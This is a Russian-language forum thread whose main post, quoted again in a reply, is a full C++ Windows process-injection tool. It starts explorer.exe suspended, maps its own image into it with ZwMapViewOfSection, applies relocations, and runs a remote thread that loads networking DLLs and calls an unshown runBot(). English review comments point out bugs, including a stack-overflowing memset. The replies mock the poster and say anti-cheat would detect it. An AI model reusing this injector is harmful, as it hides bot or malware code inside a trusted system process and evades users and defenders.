
Запускаем часть своего кода С++ в другом процессе

Запускаем часть своего кода С++ в другом процессе
C++:
// Thread entry that runs inside the target process once InjectCode() has copied
// this image there (WinMain passes it to RunInjectCode as the start routine).
// Body: LoadLibraryA() each DLL named in libList, call runBot() (declared
// elsewhere; its definition is not part of this listing), return 0 as the
// thread exit code.
// NOTE(review): the DLL loop presumably exists so that the copied image's
// already-resolved import table points at modules that are actually loaded in
// the target; that only works if those system DLLs sit at the same base in
// both processes, and nothing here verifies it.
// NOTE(review): declared with no parameter although it is started as an
// LPTHREAD_START_ROUTINE (see RunInjectCode), which is called with one LPVOID;
// the return value of LoadLibraryA() is never checked, and no C runtime
// initialisation happens in the target before runBot() runs.
DWORD WINAPI injectedCode() {
    const char* libList[] = { "shlwapi.dll", "mpr.dll", "netapi32.dll", "Gdiplus.dll", "wininet.dll", "kernel32.dll", "ws2_32.dll", "Gdi32.dll", "Ole32.dll", "Iphlpapi.dll" };
    for(int i = 0; i < _countof(libList); i++){
        LoadLibraryA((char*)libList[i]);   // the cast drops const needlessly; LoadLibraryA takes LPCSTR
    }
    runBot();   // defined elsewhere; what it does is not visible in this listing
    return 0;
}

// Apply base relocations to a copy of this image that will live at another
// address.
//   reloc     - start of the IMAGE_DIRECTORY_ENTRY_BASERELOC table. InjectCode()
//               passes the table of the *running* image, so entries are read
//               from the original mapping, not from the copy.
//   imageBase - base of the buffer that is patched (InjectCode() passes the
//               local view of the section, i.e. the copy).
//   delta     - value added to every HIGHLOW/DIR64 slot. InjectCode() computes
//               it as (remote base) - (current in-memory base), which is the
//               correct delta for bytes copied from a live, already-relocated
//               image.
//   relocSize - only tested for zero; it does NOT bound the walk.
// The walk ends at the first block whose SizeOfBlock is 0.
// NOTE(review): SizeOfBlock is never checked against relocSize, so a table
// without a zero terminator, or a corrupt one, is read past its end.
void ProcessRelocs(PIMAGE_BASE_RELOCATION reloc, SIZE_T imageBase, SIZE_T delta, DWORD relocSize)
{
    if (relocSize <= 0) return;   // relocSize is unsigned: this is just a zero check
    while (reloc->SizeOfBlock > 0)
    {
        SIZE_T va = imageBase + reloc->VirtualAddress;   // page that this block's offsets are relative to
        // entries follow the IMAGE_BASE_RELOCATION header; each is a 16-bit word: type:4 | offset:12
        unsigned short* relInfo = (unsigned short*)((byte*)reloc + IMAGE_SIZEOF_BASE_RELOCATION);

        for (DWORD i = 0; i < (reloc->SizeOfBlock - IMAGE_SIZEOF_BASE_RELOCATION) / 2; i++, relInfo++)
        {
            int type = *relInfo >> 12;
            int offset = *relInfo & 0xfff;

            switch (type)
            {
            case IMAGE_REL_BASED_ABSOLUTE:
                break;   // padding entry, nothing to patch
            case IMAGE_REL_BASED_HIGHLOW:
            case IMAGE_REL_BASED_DIR64:
                // both types are patched with a SIZE_T-wide read-modify-write, so the
                // width follows the build (4 bytes on x86, 8 on x64); a HIGHLOW entry
                // met in a 64-bit build would touch 4 bytes past the slot
                *((SIZE_T*)(va + offset)) += delta;
                break;
            }
            // any other relocation type is silently ignored
        }
        reloc = (PIMAGE_BASE_RELOCATION)(((SIZE_T)reloc) + reloc->SizeOfBlock);   // next block
    }
}

// Find the base of the PE image containing funcAddr (or this function itself
// when funcAddr is null): round the address down to a 64 KiB boundary and step
// down 64 KiB at a time until a page begins with an MZ header whose e_lfanew
// (< 0x1000) points at a "PE\0\0" signature. The base is returned as an
// HMODULE, since a loaded image's base address is its module handle.
// NOTE(review): each candidate address is dereferenced unconditionally and the
// loop has no lower bound, so an address that is not inside a loaded image (or
// an unmapped 64 KiB stretch between the function and its header) faults rather
// than failing. VirtualQuery()'s AllocationBase or GetModuleHandleEx() with
// GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS would give the same answer without the
// blind walk.
HMODULE GetImageBase(void* funcAddr)
{
    SIZE_T addr = (funcAddr) ? (SIZE_T)funcAddr : (SIZE_T)&GetImageBase;
    addr &= ~0xffff;   // align down to 64 KiB, the allocation granularity images are mapped on
    for (;;)
    {
        PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)addr;
        if (dosHeader->e_magic == IMAGE_DOS_SIGNATURE)
        {
            if (dosHeader->e_lfanew < 0x1000)   // keep the NT header lookup inside the first page
            {
                PIMAGE_NT_HEADERS header = (PIMAGE_NT_HEADERS)&((byte*)addr)[dosHeader->e_lfanew];
                if (header->Signature == IMAGE_NT_SIGNATURE)
                    break;
            }
        }
        addr -= 0x10000;   // no termination if no header is ever found
    }
    return (HMODULE)addr;
}

// Return the IMAGE_OPTIONAL_HEADER of a mapped image: e_lfanew skips the DOS
// stub to the NT headers, then the DWORD signature and the IMAGE_FILE_HEADER
// are skipped. The headers are not validated here (GetImageBase() already
// checked the signatures for the base it returns).
inline PIMAGE_OPTIONAL_HEADER GetOptionalHeader(HMODULE imageBase)
{
    return (PIMAGE_OPTIONAL_HEADER)((LPVOID)((SIZE_T)imageBase + ((PIMAGE_DOS_HEADER)(imageBase))->e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER)));
}


// Copy the whole image that contains startFunc into hprocess and return the
// address startFunc will have there (0 on failure).
//   hprocess     - target process handle; must permit mapping a section into it.
//   startFunc    - a function inside this image; used to locate the image and
//                  to compute the remote entry address.
//   newBaseImage - optional out: base of the remote copy (0 if mapping failed).
// Steps as written:
//   1. GetImageBase()/SizeOfImage give the span to copy.
//   2. A pagefile-backed section ((HANDLE)-1 == INVALID_HANDLE_VALUE) of that
//      size is created RWX, mapped writable locally, and the live image
//      (headers, code, current data) is memcpy'd into it.
//   3. The same section is mapped into the target with ZwMapViewOfSection
//      ((SECTION_INHERIT)1 == ViewShare, RWX); the base is kernel-chosen
//      because newBaseAddr starts at 0.
//   4. Relocations are applied to the local view only now, once the remote
//      base is known; both views back one section, so the target sees the
//      patched bytes.
//   5. The remote entry is startFunc rebased from imageBase to newBaseAddr.
// The local view and the section handle are released; the remote view stays
// mapped on purpose.
// NOTE(review): CreateFileMappingA()'s result is never checked (a NULL hmap
// only surfaces as a MapViewOfFile failure, and the `return false` there is a
// 0 SIZE_T); a failing NTSTATUS is discarded rather than reported; the
// ZwMapViewOfSection prototype and SECTION_INHERIT are ntdll definitions the
// author must supply, they are not in this listing.
// NOTE(review): the copy carries this process's current global state; nothing
// initialises the C runtime in the target for it.
SIZE_T InjectCode(HANDLE hprocess, typeFuncThread startFunc, HMODULE* newBaseImage)
{
    HMODULE imageBase = GetImageBase(startFunc);
    DWORD sizeOfImage = GetOptionalHeader(imageBase)->SizeOfImage;

    HANDLE hmap = CreateFileMappingA((HANDLE)-1, nullptr, PAGE_EXECUTE_READWRITE, 0, sizeOfImage, nullptr);   // unchecked

    void* view = MapViewOfFile(hmap, FILE_MAP_WRITE, 0, 0, 0);
    if (!view)    return false;   // hmap is leaked on this path if it was non-NULL

    memcpy(view, (void*)imageBase, sizeOfImage);   // snapshot of the running image

    SIZE_T viewSize = 0;
    SIZE_T newBaseAddr = 0;
    SIZE_T addr = 0;

    NTSTATUS status = ZwMapViewOfSection(hmap, hprocess, (PVOID*)&newBaseAddr, 0, sizeOfImage, nullptr, &viewSize, (SECTION_INHERIT)1, 0, PAGE_EXECUTE_READWRITE);

    if (status == 0)   // STATUS_SUCCESS
    {
        PIMAGE_DOS_HEADER pdh = (PIMAGE_DOS_HEADER)imageBase;
        PIMAGE_NT_HEADERS pe = (PIMAGE_NT_HEADERS)((byte*)pdh + pdh->e_lfanew);

        ULONG relRVA = pe->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
        ULONG relSize = pe->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
        // table read from the live image, writes go to the shared copy; delta is
        // relative to the current in-memory base, not the header's ImageBase
        ProcessRelocs((PIMAGE_BASE_RELOCATION)((SIZE_T)imageBase + relRVA), (SIZE_T)view, newBaseAddr - (SIZE_T)imageBase, relSize);

        addr = (SIZE_T)startFunc - (SIZE_T)imageBase + newBaseAddr;
    }
    if (newBaseImage) *newBaseImage = (HMODULE)newBaseAddr;
    UnmapViewOfFile(view);
    CloseHandle(hmap);   // the remote view keeps the section alive

    return addr;
}

// Inject this image into hProc via func (InjectCode) and start a remote thread
// at the rebased startFunc. Returns 1 on success, 0 otherwise.
//   hthread is accepted but never used; the local HANDLE of the same name in
//   the fallback branch shadows it.
// NOTE(review): addr is an unsigned int while func() returns a SIZE_T, so on a
// 64-bit build any remote address above 4 GiB is truncated before
// CreateRemoteThread() runs and the thread starts at the wrong address. It
// should be SIZE_T or LPVOID.
// NOTE(review): the handle from CreateRemoteThread() is leaked; only the
// RtlCreateUserThread fallback closes its handle. RtlCreateUserThread and
// CLIENT_ID are ntdll definitions the author must supply (not in this listing).
BOOL RunInjectCode(HANDLE hProc, HANDLE hthread, typeFuncThread startFunc, typeInjectCode func)
{
    unsigned int addr = func(hProc, startFunc, 0);   // truncating on x64, see note above
    if (addr == 0) return false;
    DWORD id;
    HANDLE hThread2 = CreateRemoteThread(hProc, 0, 0, (LPTHREAD_START_ROUTINE)addr, 0, 0, &id);
    if (hThread2)
    {
        return 1;   // hThread2 is never closed
    }
    else
    {
        HANDLE hthread;   // shadows the unused parameter
        CLIENT_ID cid;
        if (RtlCreateUserThread(hProc, nullptr, FALSE, 0, 0, 0, (void*)addr, 0, &hthread, &cid) == 0)
        {
            CloseHandle(hthread);
            return 1;
        }
    }
    return 0;
}

// Launch cmd with CreateProcessA and optionally wait for it.
//   options          - dwCreationFlags, passed straight through (RunExplorer
//                      uses CREATE_SUSPENDED).
//   hprocess/hthread - optional outs for the process / primary thread handles;
//                      a handle whose out pointer is NULL is closed here.
//   exitCode         - optional out, filled only when wait > 0 and the wait
//                      returned WAIT_OBJECT_0.
//   wait             - > 0: timeout in ms for WaitForSingleObject on the
//                      process; otherwise no wait.
//   cmd              - command line, used verbatim.
//   va               - unused: cmd is NOT formatted despite the name.
// Returns the new process id, or 0 when CreateProcessA failed or the wait
// timed out.
// NOTE(review): after a successful wait the handles are closed and zeroed, so
// *hprocess/*hthread receive 0 and the later CloseHandle() calls get a NULL
// handle (harmless, but sloppy). After a timed-out wait ret is 0 although the
// process is running and its handles are handed out to the caller.
// `BOOL res = FALSE; if (!res)` is a dead guard around the only CreateProcessA
// call. The cast on cmd exists because CreateProcessA takes a writable LPSTR;
// per the Win32 docs the ANSI variant does not modify the buffer but the
// Unicode one may, which matters if this is ever switched to CreateProcessW
// with a string literal as in RunExplorer.
DWORD ExecVA(DWORD options, HANDLE* hprocess, HANDLE* hthread, DWORD* exitCode, int wait, const char* cmd, va_list va)
{
    DWORD ret = 0;
    if (exitCode) *exitCode = 0;
    if (hprocess) *hprocess = 0;
    if (hthread) *hthread = 0;

    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(STARTUPINFOA));
    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));

    si.cb = sizeof(si);

    BOOL res = FALSE;
    if (!res)   // always true
    {
        res = CreateProcessA(0, (CHAR*)cmd, 0, 0, FALSE, options, 0, 0, &si, &pi);
    }
    if (res)
    {
        if (wait > 0)
        {
            if (WaitForSingleObject(pi.hProcess, wait) == WAIT_OBJECT_0)
            {
                if (exitCode)
                {
                    GetExitCodeProcess(pi.hProcess, exitCode);
                }
                CloseHandle(pi.hThread);
                CloseHandle(pi.hProcess);
                pi.hThread = 0;     // the out parameters below then receive 0
                pi.hProcess = 0;
                ret = pi.dwProcessId;
            }
            // timeout / failure: ret stays 0 but the live handles are still handed out
        }
        else
            ret = pi.dwProcessId;

        if (hthread)
            *hthread = pi.hThread;
        else
            CloseHandle(pi.hThread);

        if (hprocess)
            *hprocess = pi.hProcess;
        else
            CloseHandle(pi.hProcess);

    }
    return ret;
}

// Variadic front end for ExecVA(). NOTE(review): the va_list is forwarded but
// ExecVA never consumes it, so the extra arguments have no effect; va_end()
// is also missing.
DWORD Exec(DWORD options, HANDLE* hprocess, HANDLE* hthread, DWORD* exitCode, int wait, const char* cmd, ...)
{
    va_list va;
    va_start(va, cmd);
    return ExecVA(options, hprocess, hthread, exitCode, wait, cmd, va);
}

// Start "explorer.exe" suspended and hand back its process and thread handles.
// Returns TRUE when Exec reported a non-zero process id.
// NOTE(review): no path is given, so per the CreateProcess documentation the
// name is resolved through the search order (the launcher's own directory and
// the current directory come before the system directory) -- a same-named
// binary next to this executable or in the CWD would be started instead of
// the real shell. An absolute path built from GetWindowsDirectory() avoids
// that. Nothing in this listing ever resumes the suspended process.
BOOL RunExplorer(HANDLE* hprocess, HANDLE* hthread)
{
    return Exec(CREATE_SUSPENDED, hprocess, hthread, 0, 0, "explorer.exe") != 0;
}

// Entry point: spawn a suspended explorer.exe, copy this image into it, start
// injectedCode() there, then exit without resuming the target.
// NOTE(review): memset(&hprocess, 0, 2048) writes 2048 bytes over a
// HANDLE-sized (4/8-byte) local -- a stack overflow that clobbers the rest of
// the frame and, depending on layout, the return address; same for hthread.
// Both should be plain `= nullptr` initialisations (ExecVA zeroes the out
// parameters anyway).
// The handles are never closed here and the result of RunInjectCode is
// ignored; ExitProcess(0) ends the launcher either way. All four parameters
// are unused.
int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {
    HANDLE hprocess, hthread;
    memset((void*)&hprocess, 0, 2048);   // stack overflow, see note above
    memset((void*)&hthread, 0, 2048);    // same
    if (RunExplorer(&hprocess, &hthread))
    {
        RunInjectCode(hprocess, hthread, (typeFuncThread)injectedCode, InjectCode);
    }
    ExitProcess(0);
}
 
Запускаем часть своего кода С++ в другом процессе
C++:
// Thread entry that runs inside the target process once InjectCode() has copied
// this image there (WinMain passes it to RunInjectCode as the start routine).
// Body: LoadLibraryA() each DLL named in libList, call runBot() (declared
// elsewhere; its definition is not part of this listing), return 0 as the
// thread exit code.
// NOTE(review): the DLL loop presumably exists so that the copied image's
// already-resolved import table points at modules that are actually loaded in
// the target; that only works if those system DLLs sit at the same base in
// both processes, and nothing here verifies it.
// NOTE(review): declared with no parameter although it is started as an
// LPTHREAD_START_ROUTINE (see RunInjectCode), which is called with one LPVOID;
// the return value of LoadLibraryA() is never checked, and no C runtime
// initialisation happens in the target before runBot() runs.
DWORD WINAPI injectedCode() {
    const char* libList[] = { "shlwapi.dll", "mpr.dll", "netapi32.dll", "Gdiplus.dll", "wininet.dll", "kernel32.dll", "ws2_32.dll", "Gdi32.dll", "Ole32.dll", "Iphlpapi.dll" };
    for(int i = 0; i < _countof(libList); i++){
        LoadLibraryA((char*)libList[i]);   // the cast drops const needlessly; LoadLibraryA takes LPCSTR
    }
    runBot();   // defined elsewhere; what it does is not visible in this listing
    return 0;
}

// Apply base relocations to a copy of this image that will live at another
// address.
//   reloc     - start of the IMAGE_DIRECTORY_ENTRY_BASERELOC table. InjectCode()
//               passes the table of the *running* image, so entries are read
//               from the original mapping, not from the copy.
//   imageBase - base of the buffer that is patched (InjectCode() passes the
//               local view of the section, i.e. the copy).
//   delta     - value added to every HIGHLOW/DIR64 slot. InjectCode() computes
//               it as (remote base) - (current in-memory base), which is the
//               correct delta for bytes copied from a live, already-relocated
//               image.
//   relocSize - only tested for zero; it does NOT bound the walk.
// The walk ends at the first block whose SizeOfBlock is 0.
// NOTE(review): SizeOfBlock is never checked against relocSize, so a table
// without a zero terminator, or a corrupt one, is read past its end.
void ProcessRelocs(PIMAGE_BASE_RELOCATION reloc, SIZE_T imageBase, SIZE_T delta, DWORD relocSize)
{
    if (relocSize <= 0) return;   // relocSize is unsigned: this is just a zero check
    while (reloc->SizeOfBlock > 0)
    {
        SIZE_T va = imageBase + reloc->VirtualAddress;   // page that this block's offsets are relative to
        // entries follow the IMAGE_BASE_RELOCATION header; each is a 16-bit word: type:4 | offset:12
        unsigned short* relInfo = (unsigned short*)((byte*)reloc + IMAGE_SIZEOF_BASE_RELOCATION);

        for (DWORD i = 0; i < (reloc->SizeOfBlock - IMAGE_SIZEOF_BASE_RELOCATION) / 2; i++, relInfo++)
        {
            int type = *relInfo >> 12;
            int offset = *relInfo & 0xfff;

            switch (type)
            {
            case IMAGE_REL_BASED_ABSOLUTE:
                break;   // padding entry, nothing to patch
            case IMAGE_REL_BASED_HIGHLOW:
            case IMAGE_REL_BASED_DIR64:
                // both types are patched with a SIZE_T-wide read-modify-write, so the
                // width follows the build (4 bytes on x86, 8 on x64); a HIGHLOW entry
                // met in a 64-bit build would touch 4 bytes past the slot
                *((SIZE_T*)(va + offset)) += delta;
                break;
            }
            // any other relocation type is silently ignored
        }
        reloc = (PIMAGE_BASE_RELOCATION)(((SIZE_T)reloc) + reloc->SizeOfBlock);   // next block
    }
}

// Find the base of the PE image containing funcAddr (or this function itself
// when funcAddr is null): round the address down to a 64 KiB boundary and step
// down 64 KiB at a time until a page begins with an MZ header whose e_lfanew
// (< 0x1000) points at a "PE\0\0" signature. The base is returned as an
// HMODULE, since a loaded image's base address is its module handle.
// NOTE(review): each candidate address is dereferenced unconditionally and the
// loop has no lower bound, so an address that is not inside a loaded image (or
// an unmapped 64 KiB stretch between the function and its header) faults rather
// than failing. VirtualQuery()'s AllocationBase or GetModuleHandleEx() with
// GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS would give the same answer without the
// blind walk.
HMODULE GetImageBase(void* funcAddr)
{
    SIZE_T addr = (funcAddr) ? (SIZE_T)funcAddr : (SIZE_T)&GetImageBase;
    addr &= ~0xffff;   // align down to 64 KiB, the allocation granularity images are mapped on
    for (;;)
    {
        PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)addr;
        if (dosHeader->e_magic == IMAGE_DOS_SIGNATURE)
        {
            if (dosHeader->e_lfanew < 0x1000)   // keep the NT header lookup inside the first page
            {
                PIMAGE_NT_HEADERS header = (PIMAGE_NT_HEADERS)&((byte*)addr)[dosHeader->e_lfanew];
                if (header->Signature == IMAGE_NT_SIGNATURE)
                    break;
            }
        }
        addr -= 0x10000;   // no termination if no header is ever found
    }
    return (HMODULE)addr;
}

// Return the IMAGE_OPTIONAL_HEADER of a mapped image: e_lfanew skips the DOS
// stub to the NT headers, then the DWORD signature and the IMAGE_FILE_HEADER
// are skipped. The headers are not validated here (GetImageBase() already
// checked the signatures for the base it returns).
inline PIMAGE_OPTIONAL_HEADER GetOptionalHeader(HMODULE imageBase)
{
    return (PIMAGE_OPTIONAL_HEADER)((LPVOID)((SIZE_T)imageBase + ((PIMAGE_DOS_HEADER)(imageBase))->e_lfanew + sizeof(DWORD) + sizeof(IMAGE_FILE_HEADER)));
}


// Copy the whole image that contains startFunc into hprocess and return the
// address startFunc will have there (0 on failure).
//   hprocess     - target process handle; must permit mapping a section into it.
//   startFunc    - a function inside this image; used to locate the image and
//                  to compute the remote entry address.
//   newBaseImage - optional out: base of the remote copy (0 if mapping failed).
// Steps as written:
//   1. GetImageBase()/SizeOfImage give the span to copy.
//   2. A pagefile-backed section ((HANDLE)-1 == INVALID_HANDLE_VALUE) of that
//      size is created RWX, mapped writable locally, and the live image
//      (headers, code, current data) is memcpy'd into it.
//   3. The same section is mapped into the target with ZwMapViewOfSection
//      ((SECTION_INHERIT)1 == ViewShare, RWX); the base is kernel-chosen
//      because newBaseAddr starts at 0.
//   4. Relocations are applied to the local view only now, once the remote
//      base is known; both views back one section, so the target sees the
//      patched bytes.
//   5. The remote entry is startFunc rebased from imageBase to newBaseAddr.
// The local view and the section handle are released; the remote view stays
// mapped on purpose.
// NOTE(review): CreateFileMappingA()'s result is never checked (a NULL hmap
// only surfaces as a MapViewOfFile failure, and the `return false` there is a
// 0 SIZE_T); a failing NTSTATUS is discarded rather than reported; the
// ZwMapViewOfSection prototype and SECTION_INHERIT are ntdll definitions the
// author must supply, they are not in this listing.
// NOTE(review): the copy carries this process's current global state; nothing
// initialises the C runtime in the target for it.
SIZE_T InjectCode(HANDLE hprocess, typeFuncThread startFunc, HMODULE* newBaseImage)
{
    HMODULE imageBase = GetImageBase(startFunc);
    DWORD sizeOfImage = GetOptionalHeader(imageBase)->SizeOfImage;

    HANDLE hmap = CreateFileMappingA((HANDLE)-1, nullptr, PAGE_EXECUTE_READWRITE, 0, sizeOfImage, nullptr);   // unchecked

    void* view = MapViewOfFile(hmap, FILE_MAP_WRITE, 0, 0, 0);
    if (!view)    return false;   // hmap is leaked on this path if it was non-NULL

    memcpy(view, (void*)imageBase, sizeOfImage);   // snapshot of the running image

    SIZE_T viewSize = 0;
    SIZE_T newBaseAddr = 0;
    SIZE_T addr = 0;

    NTSTATUS status = ZwMapViewOfSection(hmap, hprocess, (PVOID*)&newBaseAddr, 0, sizeOfImage, nullptr, &viewSize, (SECTION_INHERIT)1, 0, PAGE_EXECUTE_READWRITE);

    if (status == 0)   // STATUS_SUCCESS
    {
        PIMAGE_DOS_HEADER pdh = (PIMAGE_DOS_HEADER)imageBase;
        PIMAGE_NT_HEADERS pe = (PIMAGE_NT_HEADERS)((byte*)pdh + pdh->e_lfanew);

        ULONG relRVA = pe->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
        ULONG relSize = pe->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;
        // table read from the live image, writes go to the shared copy; delta is
        // relative to the current in-memory base, not the header's ImageBase
        ProcessRelocs((PIMAGE_BASE_RELOCATION)((SIZE_T)imageBase + relRVA), (SIZE_T)view, newBaseAddr - (SIZE_T)imageBase, relSize);

        addr = (SIZE_T)startFunc - (SIZE_T)imageBase + newBaseAddr;
    }
    if (newBaseImage) *newBaseImage = (HMODULE)newBaseAddr;
    UnmapViewOfFile(view);
    CloseHandle(hmap);   // the remote view keeps the section alive

    return addr;
}

// Inject this image into hProc via func (InjectCode) and start a remote thread
// at the rebased startFunc. Returns 1 on success, 0 otherwise.
//   hthread is accepted but never used; the local HANDLE of the same name in
//   the fallback branch shadows it.
// NOTE(review): addr is an unsigned int while func() returns a SIZE_T, so on a
// 64-bit build any remote address above 4 GiB is truncated before
// CreateRemoteThread() runs and the thread starts at the wrong address. It
// should be SIZE_T or LPVOID.
// NOTE(review): the handle from CreateRemoteThread() is leaked; only the
// RtlCreateUserThread fallback closes its handle. RtlCreateUserThread and
// CLIENT_ID are ntdll definitions the author must supply (not in this listing).
BOOL RunInjectCode(HANDLE hProc, HANDLE hthread, typeFuncThread startFunc, typeInjectCode func)
{
    unsigned int addr = func(hProc, startFunc, 0);   // truncating on x64, see note above
    if (addr == 0) return false;
    DWORD id;
    HANDLE hThread2 = CreateRemoteThread(hProc, 0, 0, (LPTHREAD_START_ROUTINE)addr, 0, 0, &id);
    if (hThread2)
    {
        return 1;   // hThread2 is never closed
    }
    else
    {
        HANDLE hthread;   // shadows the unused parameter
        CLIENT_ID cid;
        if (RtlCreateUserThread(hProc, nullptr, FALSE, 0, 0, 0, (void*)addr, 0, &hthread, &cid) == 0)
        {
            CloseHandle(hthread);
            return 1;
        }
    }
    return 0;
}

// Launch cmd with CreateProcessA and optionally wait for it.
//   options          - dwCreationFlags, passed straight through (RunExplorer
//                      uses CREATE_SUSPENDED).
//   hprocess/hthread - optional outs for the process / primary thread handles;
//                      a handle whose out pointer is NULL is closed here.
//   exitCode         - optional out, filled only when wait > 0 and the wait
//                      returned WAIT_OBJECT_0.
//   wait             - > 0: timeout in ms for WaitForSingleObject on the
//                      process; otherwise no wait.
//   cmd              - command line, used verbatim.
//   va               - unused: cmd is NOT formatted despite the name.
// Returns the new process id, or 0 when CreateProcessA failed or the wait
// timed out.
// NOTE(review): after a successful wait the handles are closed and zeroed, so
// *hprocess/*hthread receive 0 and the later CloseHandle() calls get a NULL
// handle (harmless, but sloppy). After a timed-out wait ret is 0 although the
// process is running and its handles are handed out to the caller.
// `BOOL res = FALSE; if (!res)` is a dead guard around the only CreateProcessA
// call. The cast on cmd exists because CreateProcessA takes a writable LPSTR;
// per the Win32 docs the ANSI variant does not modify the buffer but the
// Unicode one may, which matters if this is ever switched to CreateProcessW
// with a string literal as in RunExplorer.
DWORD ExecVA(DWORD options, HANDLE* hprocess, HANDLE* hthread, DWORD* exitCode, int wait, const char* cmd, va_list va)
{
    DWORD ret = 0;
    if (exitCode) *exitCode = 0;
    if (hprocess) *hprocess = 0;
    if (hthread) *hthread = 0;

    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    ZeroMemory(&si, sizeof(STARTUPINFOA));
    ZeroMemory(&pi, sizeof(PROCESS_INFORMATION));

    si.cb = sizeof(si);

    BOOL res = FALSE;
    if (!res)   // always true
    {
        res = CreateProcessA(0, (CHAR*)cmd, 0, 0, FALSE, options, 0, 0, &si, &pi);
    }
    if (res)
    {
        if (wait > 0)
        {
            if (WaitForSingleObject(pi.hProcess, wait) == WAIT_OBJECT_0)
            {
                if (exitCode)
                {
                    GetExitCodeProcess(pi.hProcess, exitCode);
                }
                CloseHandle(pi.hThread);
                CloseHandle(pi.hProcess);
                pi.hThread = 0;     // the out parameters below then receive 0
                pi.hProcess = 0;
                ret = pi.dwProcessId;
            }
            // timeout / failure: ret stays 0 but the live handles are still handed out
        }
        else
            ret = pi.dwProcessId;

        if (hthread)
            *hthread = pi.hThread;
        else
            CloseHandle(pi.hThread);

        if (hprocess)
            *hprocess = pi.hProcess;
        else
            CloseHandle(pi.hProcess);

    }
    return ret;
}

// Variadic front end for ExecVA(). NOTE(review): the va_list is forwarded but
// ExecVA never consumes it, so the extra arguments have no effect; va_end()
// is also missing.
DWORD Exec(DWORD options, HANDLE* hprocess, HANDLE* hthread, DWORD* exitCode, int wait, const char* cmd, ...)
{
    va_list va;
    va_start(va, cmd);
    return ExecVA(options, hprocess, hthread, exitCode, wait, cmd, va);
}

// Start "explorer.exe" suspended and hand back its process and thread handles.
// Returns TRUE when Exec reported a non-zero process id.
// NOTE(review): no path is given, so per the CreateProcess documentation the
// name is resolved through the search order (the launcher's own directory and
// the current directory come before the system directory) -- a same-named
// binary next to this executable or in the CWD would be started instead of
// the real shell. An absolute path built from GetWindowsDirectory() avoids
// that. Nothing in this listing ever resumes the suspended process.
BOOL RunExplorer(HANDLE* hprocess, HANDLE* hthread)
{
    return Exec(CREATE_SUSPENDED, hprocess, hthread, 0, 0, "explorer.exe") != 0;
}

// Entry point: spawn a suspended explorer.exe, copy this image into it, start
// injectedCode() there, then exit without resuming the target.
// NOTE(review): memset(&hprocess, 0, 2048) writes 2048 bytes over a
// HANDLE-sized (4/8-byte) local -- a stack overflow that clobbers the rest of
// the frame and, depending on layout, the return address; same for hthread.
// Both should be plain `= nullptr` initialisations (ExecVA zeroes the out
// parameters anyway).
// The handles are never closed here and the result of RunInjectCode is
// ignored; ExitProcess(0) ends the launcher either way. All four parameters
// are unused.
int WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {
    HANDLE hprocess, hthread;
    memset((void*)&hprocess, 0, 2048);   // stack overflow, see note above
    memset((void*)&hthread, 0, 2048);    // same
    if (RunExplorer(&hprocess, &hthread))
    {
        RunInjectCode(hprocess, hthread, (typeFuncThread)injectedCode, InjectCode);
    }
    ExitProcess(0);
}
Не лучше ли использовать mmap? Разве так сложно немного разобраться в теме и хотя бы написать пояснения к основным моментам кода, а не тупо пастить с других бордов?
 
Не лучше ли использовать mmap? Разве так сложно немного разобраться в теме и хотя бы написать пояснения к основным моментам кода, а не тупо пастить с других бордов?
а фигли нам за 3 дня 25 симп
 
ZwMapViewOfSection - что это?
RtlCreateUserThread - а это что?
 
Реал чел пастит гайды и собрал 30+ симп за неделю. Это обычный инжектор, который даже ваком, наверное, будет детектиться.
 